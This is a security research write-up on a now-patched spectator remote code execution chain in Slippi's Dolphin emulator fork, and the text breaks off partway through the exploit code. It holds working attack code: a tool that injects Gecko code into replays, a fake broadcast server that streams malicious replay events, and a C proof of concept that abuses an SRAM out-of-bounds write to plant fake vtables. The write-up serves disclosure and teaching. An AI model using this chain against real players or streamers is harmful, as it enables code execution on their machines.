Slipping up Slippi with spectator RCE

This vulnerability is patched in Slippi Playback Dolphin 3.5.2, released January 14th, 2026. The launcher automatically updates it.

Super Smash Bros. Melee is a very popular party fighting game for the Nintendo GameCube. Despite three other entries (four if you're weird and count Smash 4 as two games) in the nearly 25 years since its release, Melee still enjoys a healthy competitive scene to this day due to its rushed development unintentionally leading to a fast-paced playstyle rarely seen in later, more casual-focused games. Major tournaments gather hundreds of players and sometimes even outnumber those playing the latest entry, Super Smash Bros. Ultimate!

Nowadays, most people want to play games with their friends over the internet, but since the GameCube was released when most people didn't have broadband, online play didn't exist for most of its library, including Melee. Of course, given that this is a game released on an old Nintendo console, it's safe to assume the majority of its players aren't playing exclusively on original hardware.

Instead, people play on Slippi.

Slippi is a Melee mod that deeply integrates with its own fork of the Dolphin GameCube/Wii emulator to bring automatic matchmaking, modern rollback netcode, and other quality-of-life improvements to an otherwise ancient console-only game. It's widely regarded as one of the main reasons Melee has kept a consistent playerbase, since it greatly lowers the barrier to entry for newcomers. Its netcode is also much, much better than the official online code in the later games (if you've ever played Ultimate against someone on Wi-Fi, you know how it feels).

Naturally, I wondered the same thing I do with anything else that interacts with random people on the internet:

Is there anything to exploit here?

Guest Code Execution

The first step toward any emulator escape shenanigans is getting my own code running inside the emulator in the first place. (Un)fortunately, I couldn't find anything exploitable in the main matchmaking modes, so instead I took a look at Slippi's replay system. The specification for Slippi's .slp replay format is publicly documented and available here.

One of the event types caught my eye:

Gecko codes are cheat codes, much like Action Replay or Game Genie codes. Despite being "cheat" codes, Gecko codes also get used as a general-purpose way of modding GameCube and Wii games. Slippi is no different here, as almost all of the patches it applies to Melee are applied as Gecko codes. Slippi also lets you use your own Gecko codes online, provided that they either don't change any gameplay mechanics or are also being used by your opponent (as scary as letting people use their own mods sounds, there aren't any random Super Pichus online since that would just lead to a desync). Storing Gecko codes in the replay file itself lets you play them back without needing to memorize what codes were used to record it, which is convenient for watching matches that used gameplay-altering codes.

Since Slippi happily loads any Gecko codes stored in a replay, running my own code from a replay file is fairly trivial because it's basically just a feature. All I have to do is write some shellcode to a random spot in memory and write a branch to it somewhere in game code. Easy!

Writing a big Gecko code list manually is annoying, so I used the gecko tool that's also used in Slippi's build system. Also, instead of writing my exploit code as self-contained shellcode, I decided to be lazy and use FIX94's gc-exploit-common-loader to chain from being in the middle of game code to loading a normal .dol executable I hardcoded somewhere else in memory. This lets me run my exploit code on its own during testing, then just copy it over to the replay loader later.

This gives me one really, really long Gecko code list:

$Entrypoint []
C216E750 00000007 #entry.S
7C6000A6 5463045E
7C600124 4C00012C
3C208000 60213000
38000000 9401FFC0
3C608000 60631800
7C6803A6 4E800020
60000000 00000000
04001800 7C6000A6
04001804 5463045E
04001808 60632000
0400180C 7C600124
04001810 4C00012C
...
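For anyone who hasn't stared at Gecko codes before, here's a rough Rust sketch of how the first line of each code in that list can be read. It only models the two code types that show up above (`04` for a 32-bit write, `C2` for inserting assembly at a hook address) and assumes the default base address of 0x80000000. The `GeckoOp` and `decode` names are mine and not part of any Gecko or Slippi tooling.

```rust
/// The two Gecko code types that appear in the list above.
#[derive(Debug, PartialEq)]
enum GeckoOp {
    /// `04` type: write one 32-bit value to `address`.
    Write32 { address: u32, value: u32 },
    /// `C2` type: hook `address` with `lines` 8-byte lines of PowerPC code.
    InsertAsm { address: u32, lines: u32 },
    /// Anything this sketch does not model.
    Other,
}

/// Assumed default Gecko base address (start of cached main RAM).
const BASE_ADDRESS: u32 = 0x8000_0000;

/// Decode the first "XXXXXXXX YYYYYYYY" line of a code.
fn decode(first: u32, second: u32) -> GeckoOp {
    // The top 7 bits select the code type; the low 25 bits are an
    // offset from the base address.
    let code_type = (first >> 24) & 0xFE;
    let address = BASE_ADDRESS + (first & 0x01FF_FFFF);
    match code_type {
        0x04 => GeckoOp::Write32 { address, value: second },
        0xC2 => GeckoOp::InsertAsm { address, lines: second },
        _ => GeckoOp::Other,
    }
}
```

Read this way, `C216E750 00000007` hooks 0x8016E750 with the seven lines that follow it, and `04001800 7C6000A6` stores one instruction word at 0x80001800. The lines that make up a `C2` payload are raw instructions and shouldn't be passed through `decode`.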

Now, how exactly does this get written into the replay file? Unfortunately, the specification is a bit vague about how this gets formatted internally, so I had to do some poking around on my own. I used the peppi library to read and write Slippi replays, but it also doesn't fully parse the Gecko code section. Fortunately, the Gecko code event format is basically just a binary version of what's normally in a Gecko code file, with the size aligned to 512 bytes.

use std::{fs::File, io::BufReader};

use peppi::{game::GeckoCodes, io::slippi};

// Maybe it would be easier to use the GCT output here, idk
fn convert_codes() -> GeckoCodes {
    let file = std::fs::read_to_string("../entry.txt").unwrap();

    let mut bytes = vec![];
    for line in file.lines() {
        let line = line.trim();
        // Skip blank lines and "$Name" code headers
        if line.is_empty() || line.starts_with('$') {
            continue;
        }

        let mut parts = line.split_once(' ').unwrap();
        if parts.1.len() > 8 {
            (parts.1, _) = parts.1.split_at(8);
        }
        let first = u32::from_str_radix(parts.0, 16).unwrap();
        let second = u32::from_str_radix(parts.1, 16).unwrap();

        bytes.extend_from_slice(&first.to_be_bytes());
        bytes.extend_from_slice(&second.to_be_bytes());
    }

    // Append the trailing 8-byte end marker, then zero-pad up to the next multiple of 512 bytes
    bytes.extend_from_slice(&[0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]);
    if bytes.len() % 512 != 0 {
        bytes.resize(((bytes.len() / 512) + 1) * 512, 0);
    }

    let actual_size = bytes.len() as u32;
    GeckoCodes { bytes, actual_size }
}

fn main() {
    let mut r = BufReader::new(File::open("../base.slp").unwrap());
    let mut game = slippi::read(&mut r, None).unwrap();

    game.start.slippi.version = slippi::MAX_SUPPORTED_VERSION;
    game.gecko_codes = Some(convert_codes());
    slippi::write(&mut File::create("../exploit.slp").unwrap(), &game).unwrap();
}

Finally, we have arbitrary guest code execution from a replay!

...Okay, arbitrary code execution from a replay you have to convince someone to download and watch is a bit boring. I said there would be remote code execution, right?

Spectator Mode

In addition to letting people play online matches in a way that isn't awful, Slippi also lets people watch online matches in a way that isn't awful.

Instead of requiring one of the players to screenshare on Discord to make their game watchable, Slippi's spectator mode sends just enough game state and input data to mirror the match onto another instance of Dolphin. This looks a lot better than a video stream while also using far less bandwidth, which is very much appreciated in a game that requires a half-decent internet connection. This is also commonly used by streamers running online tournaments for streaming and commentating matches, so an emulator escape that could be triggered purely from being a spectator would still be huge.

When starting a broadcast session, Slippi Launcher connects to an ENet server hosted by the Dolphin instance. Upon connecting, Dolphin starts sending the launcher a filtered selection of replay events, which the launcher then relays to a WebSocket hosted on Slippi's servers. On the receiving end, the launcher gets the replay events from the Slippi servers and streams them into a newly created .slp file, which the receiving Dolphin instance continuously tries to read events from.

So, in practice, spectator mode is basically just like reading any other replay file, except the events are streamed. Since Gecko code events can also be sent to spectators, arbitrary code can be executed inside the emulator in exactly the same way; it just has to be streamed to the server instead. Sounds easy enough.

To do this, I wrote a quick-and-dirty program that hosts its own ENet server and feeds Slippi Launcher replay events from a file instead.

use std::{
    collections::HashMap,
    fs::File,
    io::{BufReader, Cursor, Read, Seek, SeekFrom},
    net::{SocketAddr, UdpSocket},
    str::FromStr,
    time::Duration,
};

use base64::{Engine, prelude::BASE64_STANDARD};
use byteorder::ReadBytesExt;
use rusty_enet::{Event, Host, HostSettings, Packet};
use serde::{Deserialize, Serialize};

#[derive(Deserialize)]
#[serde(tag = "type")]
enum MirrorRequest {
    #[serde(rename = "connect_request")]
    ConnectRequest { cursor: usize },
}

#[derive(Serialize)]
#[serde(tag = "type")]
enum MirrorResponse<'a> {
    #[serde(rename = "connect_reply")]
    ConnectReply {
        nick: &'a str,
        version: &'a str,
        cursor: usize,
    },
    #[serde(rename = "start_game")]
    StartGame { cursor: usize, next_cursor: usize },
    #[serde(rename = "game_event")]
    GameEvent {
        payload: &'a str,
        cursor: usize,
        next_cursor: usize,
    },
}

fn main() {
    let socket = UdpSocket::bind(SocketAddr::from_str("0.0.0.0:51441").unwrap()).unwrap();
    let mut host = Host::new(
        socket,
        HostSettings {
            peer_limit: 4,
            channel_limit: 2,
            ..Default::default()
        },
    )
    .unwrap();

    println!("Ready!");
    loop {
        while let Ok(packet) = host.service()
            && let Some(event) = packet
        {
            match event {
                Event::Connect { peer, .. } => {
                    println!("Peer {} connected", peer.id().0);
                }
                Event::Disconnect { peer, .. } => {
                    println!("Peer {} disconnected", peer.id().0);
                }
                Event::Receive {
                    peer,
                    channel_id,
                    packet,
                } => {
                    if let Ok(message) = str::from_utf8(packet.data()) {
                        println!("Received packet: {message}");

                        let mut send_packet = |response: MirrorResponse| {
                            let response_json = serde_json::to_string(&response).unwrap();
                            println!("Sending packet: {response_json}");

                            let packet = Packet::reliable(response_json.as_bytes());
                            peer.send(channel_id, &packet).unwrap();
                        };

                        let request = serde_json::from_str::<MirrorRequest>(message).unwrap();
                        match request {
                            MirrorRequest::ConnectRequest { mut cursor } => {
                                println!("Sending reply");
                                send_packet(MirrorResponse::ConnectReply {
                                    nick: "Slippi Online",
                                    version: "3.5.1",
                                    cursor,
                                });

                                println!("Waiting a bit...");
                                std::thread::sleep(Duration::from_secs(10));

                                println!("Sending replay data...");
                                send_packet(MirrorResponse::StartGame {
                                    cursor,
                                    next_cursor: cursor + 1,
                                });
                                cursor += 1;

                                let mut cmd_lengths: HashMap<u8, u16> = HashMap::new();

                                let mut reader =
                                    BufReader::new(File::open("../gecko/exploit.slp").unwrap());
                                reader.seek(SeekFrom::Start(0xF)).unwrap();
                                loop {
                                    let cmd = reader.read_u8().unwrap();
                                    println!("Handling event 0x{cmd:X}");

                                    match cmd {
                                        // Event Payloads
                                        0x35 => {
                                            let size = reader.read_u8().unwrap();
                                            let event_buf = {
                                                let mut buf = vec![0u8; size as usize + 1];
                                                buf[0] = cmd;
                                                buf[1] = size;
                                                reader.read_exact(&mut buf[2..]).unwrap();
                                                buf
                                            };
                                            let mut event_reader = Cursor::new(&event_buf[2..]);

                                            for _ in 0..size / 3 {
                                                cmd_lengths.insert(
                                                    event_reader.read_u8().unwrap(),
                                                    event_reader
                                                        .read_u16::<byteorder::BigEndian>()
                                                        .unwrap(),
                                                );
                                            }

                                            let payload = BASE64_STANDARD.encode(&event_buf);
                                            send_packet(MirrorResponse::GameEvent {
                                                payload: &payload,
                                                cursor: cursor,
                                                next_cursor: cursor + 1,
                                            });
                                            cursor += 1;
                                        }
                                        x => {
                                            if let Some(&length) = cmd_lengths.get(&x) {
                                                let mut data = vec![0u8; length as usize + 1];
                                                data[0] = x;
                                                reader.read_exact(&mut data[1..]).unwrap();

                                                let payload = BASE64_STANDARD.encode(data);
                                                send_packet(MirrorResponse::GameEvent {
                                                    payload: &payload,
                                                    cursor: cursor,
                                                    next_cursor: cursor + 1,
                                                });
                                                cursor += 1;
                                            } else {
                                                println!("Unhandled command! Stopping...");
                                                break;
                                            }
                                        }
                                    }
                                }

                                println!("Should be done now!");
                            }
                        }
                    }
                }
            }
        }
        std::thread::sleep(Duration::from_millis(10));
    }
}
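The part of that loop that actually matters is how the raw stream gets cut into events, so here's the same idea pulled out into a standalone function that only needs the standard library. It's a sketch under the same assumptions as the program above: the stream starts with the Event Payloads event (0x35), whose size byte counts itself plus a table of (command byte, big-endian u16 length) entries, and every later event is one command byte followed by that many payload bytes. `split_events` is a name I made up for illustration.

```rust
use std::collections::HashMap;

/// Split a raw Slippi event stream into individual events.
/// Returns None if the stream is truncated or does not start with 0x35.
fn split_events(raw: &[u8]) -> Option<Vec<Vec<u8>>> {
    // Event Payloads comes first and describes every other event's size
    if *raw.first()? != 0x35 {
        return None;
    }
    let size = *raw.get(1)? as usize;
    let table = raw.get(2..1 + size)?;

    // Each table entry is: command byte, then a big-endian u16 length
    let mut lengths: HashMap<u8, usize> = HashMap::new();
    for entry in table.chunks_exact(3) {
        let len = u16::from_be_bytes([entry[1], entry[2]]) as usize;
        lengths.insert(entry[0], len);
    }

    // The first event is the Event Payloads event itself
    let mut events = vec![raw[..1 + size].to_vec()];
    let mut pos = 1 + size;
    while pos < raw.len() {
        // Stop at the first command byte the table does not describe
        let Some(&len) = lengths.get(&raw[pos]) else { break };
        let end = pos + 1 + len;
        events.push(raw.get(pos..end)?.to_vec());
        pos = end;
    }
    Some(events)
}
```

Each returned chunk is what would get Base64-encoded into one `game_event` message. Stopping at the first unknown command byte mirrors the "Unhandled command" branch above.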

And with that, I now have a way of getting arbitrary guest code execution remotely! That was a lot of preparation work without any real exploits being written yet, but at least I can finally get to the fun part now.

Breaking out of Dolphin

When it comes to memory safety vulnerabilities, console emulators don't have the best track record (yes, those are all separate links). It's probably some combination of many popular ones having codebases dating back to the early 2000s, the need to emulate lots of different block copies for DMA, and there being more of a focus on just getting the games to work instead of hardening against potentially malicious code. Either way, I think there isn't enough vulnerability research that targets them, given that random ROM hacks or Totally Legitimately Acquired Game Backups also count as untrusted code.

Thankfully for me, in the case of Dolphin, I don't even have to find the vulnerability myself! One of the first changes mentioned in Dolphin's February, March, and April 2024 Progress Report is a patch for an easily controllable out-of-bounds read/write, followed by a few paragraphs about why patching these kinds of bugs is important.

The GameCube has a 64-byte region of battery-backed SRAM that it uses to keep track of some basic information like audio settings, screen offset, language (PAL only), and the real-time clock. All of this is configured in the GameCube's Initial Program Loader (IPL), also known as that big cube menu with all of the settings and memory card stuff.

This area isn't mapped directly in memory anywhere, but is instead accessed via the External Interface (EXI) bus. This means that data has to be copied to and from main memory via DMA in order to be accessed. Hey, didn't I say something about DMA in emulators leading to some issues earlier?

When an EXI DMA is started, Dolphin calls IEXIDevice::DMAWrite on the appropriate device.

void IEXIDevice::DMAWrite(u32 _uAddr, u32 _uSize)
{
    // _dbg_assert_(EXPANSIONINTERFACE, 0);
    while (_uSize--)
    {
        u8 uByte = Memory::Read_U8(_uAddr++);
        TransferByte(uByte);
    }
}

IEXIDevice::TransferByte is a virtual function overridden by each device. In this case, the device is CEXIIPL.

void CEXIIPL::TransferByte(u8& _uByte)
{
    // The first 4 bytes must be the address
    // If we haven't read it, do it now
    if (m_uPosition <= 3)
    {
        m_uAddress <<= 8;
        m_uAddress |= _uByte;
        m_uRWOffset = 0;
        _uByte = 0xFF;

        // Check if the command is complete
        if (m_uPosition == 3)
        {
            // Get the time...
            UpdateRTC();

            // ...
        }
    }
    else
    {
        // Actually read or write a byte
        switch (CommandRegion())
        {
        case REGION_RTC:
            if (IsWriteCommand())
                m_RTC[(m_uAddress & 0x03) + m_uRWOffset] = _uByte;
            else
                _uByte = m_RTC[(m_uAddress & 0x03) + m_uRWOffset];
            break;

        case REGION_SRAM:
            if (IsWriteCommand())
                g_SRAM.p_SRAM[(m_uAddress & 0x3F) + m_uRWOffset] = _uByte;
            else
                _uByte = g_SRAM.p_SRAM[(m_uAddress & 0x3F) + m_uRWOffset];
            break;

        // ...
        }

        m_uRWOffset++;
    }

    m_uPosition++;
}

m_uRWOffset is incremented for each byte accessed but is never checked against the bounds of m_RTC or p_SRAM, leading to a trivial out-of-bounds read and write primitive. To test this, I wrote a quick devkitPPC program that writes a lot of garbage into SRAM.

#include <string.h>
#include <gccore.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

int main() {
    static char dummy[1024];
    memset(dummy, 0x41, sizeof(dummy));
    __sram_write(dummy, sizeof(dummy));
}
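To see what a transfer like that does without booting anything, here's a small host-side model of the indexing logic in Rust. It's only a sketch: `memory` stands in for g_SRAM plus whatever happens to sit after it, the index math is copied from the REGION_SRAM case above, and the bounds-checked variant is a hypothetical fix for comparison rather than a copy of the upstream patch.

```rust
/// Size of the emulated SRAM array (`p_SRAM[64]` in the source).
const SRAM_SIZE: usize = 64;

/// Model of the vulnerable write path: the index comes only from the
/// masked address plus the running offset, with no bounds check.
fn dma_write_unchecked(memory: &mut [u8], address: u32, data: &[u8]) {
    let start = (address & 0x3F) as usize;
    for (rw_offset, &byte) in data.iter().enumerate() {
        // Happily walks past SRAM_SIZE into the neighboring bytes
        memory[start + rw_offset] = byte;
    }
}

/// Hypothetical hardened variant: bytes that would land outside the
/// SRAM array are dropped.
fn dma_write_checked(memory: &mut [u8], address: u32, data: &[u8]) {
    let start = (address & 0x3F) as usize;
    for (rw_offset, &byte) in data.iter().enumerate() {
        let index = start + rw_offset;
        if index < SRAM_SIZE {
            memory[index] = byte;
        }
    }
}

/// Count how many bytes beyond the SRAM array were modified,
/// assuming `memory` started out zeroed.
fn bytes_clobbered(memory: &[u8]) -> usize {
    memory[SRAM_SIZE..].iter().filter(|&&b| b != 0).count()
}
```

With a zeroed 256-byte `memory` and 128 bytes of 0x41, the unchecked version leaves 64 stray bytes after the array, while the checked one leaves none. In the real emulator those stray bytes land on whatever globals come next.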

A free bug that looks exploitable! Nice!

...Wait, that bug was patched two years ago. Why is this Dolphin vulnerable? To answer that, we need a short history lesson.

A long time ago, a developer named Tino created a fork of Dolphin called Ishiiruka, which aimed to maintain support for and improve performance on older hardware, at the cost of accuracy and stability due to some of the hacky workarounds it used. It hasn't been updated since around 2021 and seemed to diverge quite a bit from upstream even back then.

However, there was another fork called Faster Melee, which, as the name implies, was a fork of Ishiiruka specifically tailored for getting better performance out of Dolphin's built-in Netplay code on Melee. As you might've guessed from the fact that Slippi's Dolphin still says "Faster Melee" in its titlebar, this is what Slippi's build was forked from. According to the commit history, it seems like FM was last synced with Ishiiruka all the way back in July 2017.

If you think being based on an ancient version of Dolphin from almost a decade ago sounds like it would be really annoying for the developers, you'd be completely right as far as I can tell. There's a work-in-progress port of Slippi to mainline Dolphin, but it's currently only considered an opt-in beta build. Also, Slippi uses two separate builds of Dolphin: one for actual gameplay and one for replay playback. The mainline Dolphin version only supports gameplay so far, so all replays are played back on Ishiiruka builds.

Anyway, back to figuring out how to exploit the bug. p_SRAM is just the raw byte array representation of the SRAM union and isn't a pointer:

union SRAM {
    u8 p_SRAM[64];
    struct  // Stored configuration value from the system SRAM area
    {
        u16 checksum;        // Holds the block checksum.
        u16 checksum_inv;    // Holds the inverse block checksum
        u32 ead0;            // Unknown attribute
        u32 ead1;            // Unknown attribute
        u32 counter_bias;    // Bias value for the realtime clock
        s8 display_offsetH;  // Pixel offset for the VI
        u8 ntd;              // Unknown attribute
        u8 lang;             // Language of system
        SRAMFlags flags;     // Device and operations flag

        // Stored configuration value from the extended SRAM area
        u8 flash_id[2][12];     // flash_id[2][12] 96bit memorycard unlock flash ID
        u32 wirelessKbd_id;     // Device ID of last connected wireless keyboard
        u16 wirelessPad_id[4];  // 16-bit device ID of last connected pad.
        u8 dvderr_code;         // last non-recoverable error from DVD interface
        u8 __padding0;          // reserved
        u8 flashID_chksum[2];   // 8-bit checksum of unlock flash ID
        u32 __padding1;         // padding
    };
};

And g_SRAM is defined as a global variable near the top of EXI.cpp, making this a static memory overflow:

// Copyright 2008 Dolphin Emulator Project
// Licensed under GPLv2+
// Refer to the license.txt file included.

// ...

SRAM g_SRAM;
bool g_SRAM_netplay_initialized = false;

namespace ExpansionInterface
{
// ...

Looking at a locally compiled build of Slippi Dolphin, these are the fields immediately following g_SRAM:

.data:0000000001BD7E30 ; SRAM g_SRAM
.data:0000000001BD7E30 ?g_SRAM@@3TSRAM@@A SRAM <?>             ; DATA XREF: Header::Header(int,ushort,bool)+46↑o
.data:0000000001BD7E30                                         ; NetPlayServer::OnConnect(_ENetPeer *)+3E4↑o ...
.data:0000000001BD7E70 ; bool g_SRAM_netplay_initialized
.data:0000000001BD7E70 ?g_SRAM_netplay_initialized@@3_NA db ?  ; DATA XREF: ExpansionInterface::Init(void)+1F↑r
.data:0000000001BD7E70                                         ; NetPlayServer::OnConnect(_ENetPeer *)+380↑r ...
.data:0000000001BD7E71                 align 8
.data:0000000001BD7E78 ; std::map<int,std::string> quickChatOptions_103
.data:0000000001BD7E78 quickChatOptions_103 std::map<int,std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::less<int>,std::allocator<std::pair<int const ,std::basic_string<char,std::char_traits<char>,std::allocator<char> > > > > <?>
.data:0000000001BD7E78                                         ; DATA XREF: _dynamic_initializer_for__quickChatOptions___103+81↑w
.data:0000000001BD7E78                                         ; _dynamic_initializer_for__quickChatOptions___103+AD↑w ...
.data:0000000001BD7E88 ; CoreTiming::EventType *ExpansionInterface::changeDevice
.data:0000000001BD7E88 ExpansionInterface__changeDevice dq ?   ; DATA XREF: ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+24↑r
.data:0000000001BD7E88                                         ; ExpansionInterface::ChangeDevice(uchar,TEXIDevices,uchar)+43↑r ...
.data:0000000001BD7E90 ; CoreTiming::EventType *ExpansionInterface::updateInterrupts
.data:0000000001BD7E90 ExpansionInterface__updateInterrupts dq ?
.data:0000000001BD7E90                                         ; DATA XREF: ExpansionInterface::Init(void)+25B↑w
.data:0000000001BD7E90                                         ; ExpansionInterface::ScheduleUpdateInterrupts(CoreTiming::FromThread,int)+9↑r
.data:0000000001BD7E98 ; std::array<std::unique_ptr<CEXIChannel>,3> ExpansionInterface::g_Channels
.data:0000000001BD7E98 ExpansionInterface__g_Channels std::array<std::unique_ptr<CEXIChannel,std::default_delete<CEXIChannel> >,3> <?>
.data:0000000001BD7E98                                         ; DATA XREF: ExpansionInterface__ChangeDeviceCallback+20↑o
.data:0000000001BD7E98                                         ; ExpansionInterface::DoState(PointerWrap &)+12↑o ...

quickChatOptions doesn't appear to be a good corruption target since there wouldn't be any function pointers to mess with, and it's only used by a config menu that isn't even accessible in Playback builds. ExpansionInterface::changeDevice is a callback, which seems more promising, but it only gets called when an EXI device gets changed during emulation, which can only happen from the user messing with config menus or savestates. updateInterrupts is also a callback, but that only gets called from Ethernet or microphone EXI devices, neither of which is enabled by default.

Finally, this leaves ExpansionInterface::g_Channels. CEXIChannel doesn't contain any function pointers on its own, but it does contain pointers to IEXIDevice objects, which have plenty of virtual functions to overwrite.

// Devices
enum
{
    NUM_DEVICES = 3
};

std::array<std::unique_ptr<IEXIDevice>, NUM_DEVICES> m_devices;

So, the plan here is to create a fake CEXIChannel populated with fake IEXIDevice objects with virtual functions that point to a ROP chain. Though, I'll have to figure out how to get the base addresses of both the main executable and the emulated main RAM before I can do any of that. It would be really nice if I didn't have to deal with leaking addresses, though...

Who am I kidding? This version of Dolphin is 64-bit and gets compiled with Visual Studio 2019. Obviously, there's gonna be ASLR! Still, I guess it doesn't hurt to check.

It turns out that Dolphin didn't have ASLR since a VS2013 update in 2013 and didn't get it back until June 2017. The last time Faster Melee synced with Ishiiruka was about a month after this pull request got merged, but they synced it with its "Stable" branch, which didn't have this commit in it. Ouch!

Anyway, I still need to find where the emulated main RAM is in memory to do anything useful, so let's see how I can get that.

Dolphin uses a very interesting method of ensuring that its emulated memory accesses are as fast as possible. Traditionally, given a hardcoded address map, an emulator would manually check the ranges on each memory access to see which region of memory it should go to. Doing this for every single memory access is quite slow, so Dolphin's developers came up with a trick called "Fastmem".

First, a massive 16GB region of address space is reserved (not allocated!). This doesn't give it any backing memory, but just reserves that part of the address space for use later.

u8* MemArena::FindMemoryBase()
{
    // Non-Win64 omitted
    u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE);
    VirtualFree(base, 0, MEM_RELEASE);
    return base;
}

Then, parts of that reserved region are carved out and allocated for the regions with backing memory.

static bool Memory_TryBase(u8* base, MemoryView* views, int num_views, u32 flags, MemArena* arena)
{
    // OK, we know where to find free space. Now grab it!
    // We just mimic the popular BAT setup.

    int i;
    for (i = 0; i < num_views; i++)
    {
        MemoryView* view = &views[i];
        void* view_base;
        bool use_sw_mirror;

        SKIP(flags, view->flags);

#if _ARCH_64
        // On 64-bit, we map the same file position multiple times, so we
        // don't need the software fallback for the mirrors.
        view_base = base + view->virtual_address;
        use_sw_mirror = false;
#else
        // On 32-bit, we don't have the actual address space to store all
        // the mirrors, so we just map the fallbacks somewhere in our address
        // space and use the software fallbacks for mirroring.
        view_base = base + (view->virtual_address & 0x3FFFFFFF);
        use_sw_mirror = true;
#endif

        if (use_sw_mirror && (view->flags & MV_MIRROR_PREVIOUS))
        {
            view->view_ptr = views[i - 1].view_ptr;
        }
        else
        {
            view->mapped_ptr = arena->CreateView(view->shm_position, view->size, view_base);
            view->view_ptr = view->mapped_ptr;
        }

        if (!view->view_ptr)
        {
            // Argh! ERROR! Free what we grabbed so far so we can try again.
            MemoryMap_Shutdown(views, i + 1, flags, arena);
            return false;
        }

        if (view->out_ptr)
            *(view->out_ptr) = (u8*)view->view_ptr;
    }

    return true;
}

Since that massive reserved block can fit the whole 32-bit address space (4GB for address translation off, 4GB for it on, and 4GB + 4GB of unmapped padding after them just in case), the JIT can then (ab)use the host's MMU to automatically translate addresses to the right place by using that region as a base for a 32-bit offset. If any memory access hits unmapped host memory (e.g., MMIO) within that region, the JIT goes and patches the memory access to use the slower method and tries again. Since most memory accesses only access main RAM, this is a net win!
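To make the difference concrete, here's a toy comparison of the two lookup styles in Rust. It's a heavily simplified sketch: the map only knows about the cached and uncached mirrors of the GameCube's 24MB of main RAM, `arena_base` stands for whichever base the JIT uses for the current translation mode, and none of these names come from Dolphin.

```rust
/// Size of emulated GameCube main RAM (24MB).
const RAM_SIZE: u32 = 0x0180_0000;

/// Where an emulated access ends up.
#[derive(Debug, PartialEq)]
enum Target {
    /// Offset into main RAM.
    MainRam(u32),
    /// MMIO, unmapped space, and everything else this sketch ignores.
    Other,
}

/// "Traditional" lookup: range-check every single access.
fn slow_lookup(guest: u32) -> Target {
    // Cached (0x80000000) and uncached (0xC0000000) mirrors of main RAM
    for mirror in [0x8000_0000u32, 0xC000_0000] {
        if guest >= mirror && guest - mirror < RAM_SIZE {
            return Target::MainRam(guest - mirror);
        }
    }
    Target::Other
}

/// Fastmem-style lookup: no branches, just base plus a 32-bit offset.
/// If nothing is mapped at the result, the host MMU faults and the
/// access gets redirected to the slow path.
fn fastmem_host_address(arena_base: u64, guest: u32) -> u64 {
    arena_base + u64::from(guest)
}
```

The slow path has to walk a table for every load and store, while the fast path compiles down to a single add that the JIT can fold into the addressing mode of the host instruction.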

Fastmem is a really cool optimization, but how does that help with the exploit? Well, despite having a whole 48 bits of address space to work with, Windows only ever seems to try to reserve that massive chunk of memory at the lowest address it can. There isn't a whole lot allocated by Dolphin or any of its libraries before booting a game, so there isn't much fragmentation in the address space. Near the top of the lowest 2GB of address space is KUSER_SHARED_DATA, which is always at 0x7FFE0000 no matter what. There's a massive gap in address space between the end of KUSER_SHARED_DATA and the DLLs that get loaded in the 0x007FF... range due to ASLR, so where does Windows put the Fastmem arena?

Right after KUSER_SHARED_DATA at 0x7FFF0000 every single time, of course! This isn't a fluke; it really is this consistent on all of the PCs I've tested.
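With a fixed arena base, turning a guest pointer into a host pointer is plain arithmetic. The Rust sketch below shows the calculation and the byte order involved. `RAM_BASE` matches the constant used in the exploit code and is taken from this post rather than probed, and the helper names are made up for illustration.

```rust
/// Fastmem arena base, matching RAM_BASE in the exploit code
/// (an observed value, not something this sketch discovers).
const RAM_BASE: u64 = 0x7FFF_0000;

/// Translate a guest pointer into the host address of the same byte.
fn guest_to_host(guest: u32) -> u64 {
    // Drop the top bit to turn 0x80000000-based addresses into offsets
    RAM_BASE + u64::from(guest & 0x7FFF_FFFF)
}

/// Bytes that must sit in memory for the little-endian x86-64 host
/// to read `host_ptr` back as a pointer.
fn host_pointer_bytes(host_ptr: u64) -> [u8; 8] {
    host_ptr.to_le_bytes()
}

/// The value a big-endian guest has to store to produce those bytes.
fn as_guest_u64(host_ptr: u64) -> u64 {
    host_ptr.swap_bytes()
}
```

For example, guest address 0x80001800 maps to host address 0x7FFF1800, which has to be laid out in guest memory as `00 18 FF 7F 00 00 00 00`. A big-endian store of the byte-swapped value produces exactly that layout.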

Now that I know that I don't need any leaks, let's start poking around with this fake CEXIChannel.

#include <string.h>
#include <gccore.h>
#include <ogc/machine/processor.h>

// Adapted from internal libogc code
static void __sram_write(void *buffer, u32 size) {
    EXI_Lock(EXI_CHANNEL_0, EXI_DEVICE_1, NULL);
    EXI_Select(EXI_CHANNEL_0, EXI_DEVICE_1, EXI_SPEED8MHZ);

    u32 cmd = 0xA0000100;
    EXI_Imm(EXI_CHANNEL_0, &cmd, 4, EXI_WRITE, NULL);
    EXI_Sync(EXI_CHANNEL_0);
    EXI_Dma(EXI_CHANNEL_0, buffer, size, EXI_WRITE, NULL);
}

typedef struct {
    u8 gap0[0x18];
    u64 m_devices[3]; // IEXIDevice*[3]
    u8 gap30[0x8];
} CEXIChannel;
static_assert(sizeof(CEXIChannel) == 0x38);

#define RAM_BASE 0x7FFF0000uL
#define TARGET_PTR_OFFSET 0x58

static u64 guest_to_host_addr(const void* input) {
    return RAM_BASE + ((u32)input & 0x7FFFFFFF);
}

int main() {
    u8 fake_vtbl[256];
    for (int i = 0; i < 256; i++)
        fake_vtbl[i] = i;
    
    // Addresses have to be byteswapped because PowerPC is big endian
    u64 fake_device = bswap64(guest_to_host_addr(&fake_vtbl));
    
    CEXIChannel fake_channel;
    memset(&fake_channel, 0x99, sizeof(fake_channel));
    for (int i = 0; i < 3; i++)
        fake_channel.m_devices[i] = bswap64(guest_to_host_addr(&fake_device));

    // Overwrites g_Channels[0]
    static char buf[TARGET_PTR_OFFSET + 8];
    u64 ptr = bswap64(guest_to_host_addr(&fake_channel));
    memcpy(buf + TARGET_PTR_OFFSET, &ptr, sizeof(ptr));
